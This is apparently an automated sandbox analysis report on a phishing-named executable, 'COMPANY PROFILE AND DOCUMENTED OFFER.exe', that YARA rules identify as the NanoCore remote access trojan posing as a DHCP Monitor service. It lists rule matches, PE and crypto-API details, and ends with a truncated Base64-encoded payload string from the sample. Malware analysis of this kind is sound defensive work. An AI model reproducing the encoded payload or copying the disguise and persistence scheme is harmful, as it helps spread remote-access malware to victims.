Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 5980, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.dhcpmon.exe.2dc9658.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b04c79.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

.NET source code contains very large strings

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, LogIn.cs	Long String: Length: 13656
Source: sjZXfoyePbSa.exe.0.dr, LogIn.cs	Long String: Length: 13656
Source: 0.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: dhcpmon.exe.7.dr, LogIn.cs	Long String: Length: 13656
Source: 7.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.9a0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 8.2.dhcpmon.exe.b50000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 8.0.dhcpmon.exe.b50000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 14.2.dhcpmon.exe.960000.1.unpack, LogIn.cs	Long String: Length: 13656

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_0137C2B0
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_01379990
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B0040
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B9628
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B3048
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B3058
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B3298
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B32A8
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090B0D80
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Code function: 0_2_090BCE80
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_02E6C2B0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_02E69990
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_06070040
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071FEFC0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F9628
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F0040
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F32A8
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071FC570
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F0D80
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F3058
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 8_2_071F3048
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_013BE471
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_013BE480
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 14_2_013BBBD4

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 5980, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.dhcpmon.exe.2dc9658.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.2dc9658.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b0a6a5.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4b04c79.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.COMPANY PROFILE AND DOCUMENTED OFFER.exe.4af064e.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sjZXfoyePbSa.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: dhcpmon.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.dhcpmon.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, LogIn.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVL